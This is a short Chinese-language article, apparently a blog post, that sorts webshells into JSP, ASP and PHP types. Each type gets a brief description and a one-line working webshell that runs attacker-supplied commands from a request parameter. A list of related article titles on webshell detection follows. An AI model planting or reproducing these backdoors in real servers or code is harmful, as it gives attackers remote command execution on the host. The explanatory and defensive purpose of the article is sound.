Webshell分类

简介: Webshell分类

Webshell分类
根据不同的脚本名称划分,常见的Webshell脚本类型有JSP、ASP、PHP等。

1. JSP型Webshell脚本
JSP全称Java Server Pages,是一种动态Web资源的开发技术。JSP是在传统的网页HTML文件(.html,.html)中插入Java程序段(scriptlet)和JSP标记(tag),从而形成JSP文件(*.jsp)。

JSP型WebShell脚本如下:

<%Runtime.getRuntime().exec(request.getParameter("i"));%>

2. ASP型Webshell脚本
ASP全称Active Server Page,是服务器开发专用脚本。它可以与数据库和其他程序进行交互,是在IIS中运行的一种程序。

ASP型Webshell脚本如下:

<%eval request("cmd")%>

3. PHP型Webshell脚本
PHP全称 Hpyertext Preprocessor,是一种通用开源脚本语言,主要适用于Web开发领域。PHP可支持常见的数据库及操作系统,可快速地执行动态网页。

PHP型Webshell脚本如下:

<?php
    $a=exec($_GET["input"]);
    echo $a;
    ?>

以上是Webshell的分类,希望对您有所启发,欢迎点赞和转发、关注。

相关文章
|
开发框架 监控 安全
webshell检测方法归纳
webshell检测方法归纳
648 0
|
1月前
|
SQL 监控 安全
SQL注入公鸡分类及原理
SQL注入公鸡分类及原理
|
6月前
|
安全 数据安全/隐私保护
webshell后门分析
webshell后门分析
96 3
|
6月前
|
安全 数据安全/隐私保护
webshell菜刀后门分析
webshell菜刀后门分析
35 1
|
数据采集 SQL 开发框架
菜刀webshell特征分析
菜刀webshell特征分析
399 0
菜刀webshell特征分析
|
搜索推荐 物联网 双11
那一天我带着满怀恶意的问题去问大模型
那一天我带着满怀恶意的问题去问大模型
169 2
|
安全 API Windows
恶意病毒逆向分析实验1
恶意病毒逆向分析
|
XML 开发框架 安全
WebShell 特征分析
`WebShell`是黑客经常使用的一种恶意脚本,其目的是获得服务器的执行操作权限,常见的webshell编写语言为`asp `/`jsp`/`php`。主要用于网站管理,服务器管理,权限管理等操作。使用方法简单,只需要上传一个代码文件,通过网址访问,便可进行很多日常操作,极大地方便了使用者对网站的服务器的管理。
489 0
|
SQL 安全 JavaScript
常见漏洞分类
常见漏洞分类
309 0
常见漏洞分类
|
存储 安全 关系型数据库
webshell网站木马文件后门如何根据特征删除
Webshell实际上是一个能够执行恶意功能的PHP代码文件。Webshell要执行恶意功能,其代码结构主要由两部分组成:数据传递部分和数据执行部分。在webshell中,数据传递部分是指webshell中用来接收外部输入数据的部分,webshell可以根据外部输入数据动态地交互执行恶意功能。在webshell中,数据执行部分指的是webshell中的system函数,用于执行代码执行和执行命令等命令。
386 0
webshell网站木马文件后门如何根据特征删除